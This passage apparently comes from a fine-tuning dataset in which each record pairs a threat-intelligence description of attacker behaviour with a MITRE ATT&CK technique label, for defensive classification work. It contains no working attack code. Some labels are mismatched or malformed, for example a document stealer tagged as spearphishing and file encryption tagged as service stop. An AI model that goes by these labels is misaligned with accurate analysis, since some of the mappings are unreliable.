Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has distributed URLs in phishing e-mails that link to lure documents." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The HTTP variant checks if Kaspersky is installed on the victim’s machine by searching for the existence of files in the Kaspersky installation folder" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment. TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target’s network. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection" }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master’s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL can enumerate registry keys." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors used the native Windows task scheduler tool to use scheduled tasks for execution on a victim network." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used regsvr32.exe to execute scripts." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to execute binaries on remote systems by creating and starting a service." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has collected the domain name of the victim system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a module for performing remote desktop access." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts." }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT can use email attachments for C2 communications." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 obfuscates C2 traffic with an altered version of base64." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors — both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The malicious emails display a strong command of the English language, and their content may have been taken from legitimate emails relevant to the business of the targeted organization. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright" }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DDKONG decodes an embedded configuration using XOR." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group is known to utilize WMI for lateral movement." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Creating malicious Word documents by injecting a remote template URL 2) Hosting a C2 server to gather credentials entered into authentication dialog boxes displayed when attempting to obtain the remote template" }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has dumped password hashes for use in pass the hash authentication attacks." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "likely obtained a list of hosts in the victim environment." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can list files and directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The two resources that contain commands that ISMInjector uses for persistence are named “Tsk1” and “Tsk2”. The specific commands within each of these resources are within Table 1. At a high level, the“Tsk1” command creates a scheduled task named “ReportHealth” that is meant to run a payload saved to \"%localappdata%\\srvHealth.exe” every 4 minutes. The “Tsk2” command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the “certutil” command to decode the original payload saved to “srvBS.txt" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pasam creates a backdoor through which remote attackers can upload files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has registered malicious domains for use in intrusion campaigns." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has used Windows DDE for execution of commands and a malicious VBS." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used multiple command-line utilities to enumerate running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Siloscape itself is obfuscated and uses obfuscated API calls." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Data captured by is placed in a temporary file under a directory named \"memdump\"." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can create a Visual Basic script to enable persistence." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PyDCrypt has decrypted and dropped the DCSrv payload to disk." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has executed a Lua script through a Lua interpreter for Windows." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can enumerate running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sibot has queried the registry for proxy server information." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has deleted files associated with their payload after execution." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the malicious RTF document is opened, two things happen that allow the attacker malware to run. First, the \"packager trick\" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete files and itself after infection to avoid analysis." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern: Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS has used \"get_tasklist\" to discover processes on the compromised host." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FruitFly will delete files on the system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The worm deploys the XMRig mining tool to mine monero crypto-currency and generate cash for the attackers. One of the Mining pools they use provides detailed information about the systems the worm has compromised" }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688)." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The scripts themselves could be easily extracted and decompiled out of the binaries using uncompyle. The decompiled scripts employed some visual obfuscation techniques by naming variables as combinations of the characters ‘o’, ‘O’, and ‘0’ to hinder analysis. In-depth analysis of the scripts showed the group employed AES in CBC mode using a predefined static key to encrypt files before uploading them to the C2 server" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors spawned a new `cmd.exe` process to execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BadPatch collects the OS system, OS version, MAC address, and the computer name from the victim’s machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the user opens the file and the exploitation is successful, a backdoor Trojan is installed on the system that gives the attacker access and a decoy document is displayed to the victim. The main module is also responsible for communicating with its C2 servers and handling commands issued by the C2 server. Figure 8: FakeM Architecture . All FakeM variants initiate communications with its C2 server and check the C2’s response for a command. After sending the acknowledgement packet, the Trojan will gather local system information and include it in a beacon to the C2 server. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4. Unit 42 tracks this mobile Trojan as MobileOrder, as the authors specifically refer to commands within the app as orders. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. The C2 server will respond to requests from MobileOrder with commands that the Trojan refers to as “orders”. MobileOrder contains a command handler with functionality that provides a fairly robust set of commands, as seen in Table 6. Table 6: MobileOrder command handler . Infrastructure Overlap and Related Tools . There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants, as well other Trojans such as MobileOrder, Psylo, and CallMe. Actors will run HTRAN on a server and configure their malware to interact with that server; however, the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze has gathered all of the running system processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RemoteCMD can execute commands remotely by creating a new service on the remote system." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE compresses collected files with GZipStream before sending them to its C2 server." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers" }, { "role": "assistant", "content": "T1559.001 - Component Object Model" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can establish persistence by creating a scheduled task." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "infpub.dat appears to be capable of brute-forcing NTLM login credentials to Windows machines that have pseudo-random IP addresses" }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers domain and account names/information through process monitoring." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZLib has the ability to obtain screenshots of the compromised system." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enumerate Registry values, keys, and data." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook." }, { "role": "assistant", "content": "T1559.001 - Component Object Model" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Each targeted file is opened, read, encrypted in memory, and then written to a new file in the malware’s working directory using the filename format <random number>.WNCRYT. The files are then renamed to their original filename followed by the .WINCRY extension and moved to their original directory. The taskdl.exe process launched by the malware periodically deletes the remaining WINCRYT temporary files. The encryption process does not directly overwrite file data, so forensic recovery of file contents may be possible depending on the environment. The entire contents of the file are encrypted and saved with a custom header (see Figure 7" }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has sent spearphishing attachments attempting to get a user to click." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA551 has prompted users to enable macros within spearphishing attachments to install malware." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences." }, { "role": "assistant", "content": "T1552.006 - Unsecured Credentials: Group Policy Preferences" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has used \"rundll32\" to load malicious DLLs." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used malware that can upload additional files to the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It was pretending to be an Adobe flash player update installer on a compromised website to lure users to click for the execution" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `net user` command to gather account information." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sends phishing mail to given recipients and receives user’s access token using device code authentication flow" }, { "role": "assistant", "content": "T1528 - Steal Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QAKBOT can inject itself into processes like wermgr.exe" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remcos uses Python scripts." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type has temporarily stored collected information to the files `“%AppData%\\{Unique Identifier}\\HOSTRURKLSR”` and `“%AppData%\\{Unique Identifier}\\NEWERSSEMP”`." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Smoke Loader spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Network analysis — run one of the plugins to retrieve Active Directory and network information (Fig" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used VBScript and JavaScript files to execute its payload." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 has created services to appear as benign system tools." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has interacted with compromised systems to browse and copy files through its graphical user interface in sessions." }, { "role": "assistant", "content": "T1061 - Graphical User Interface" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A VBA Macro sets its file attributes to System and 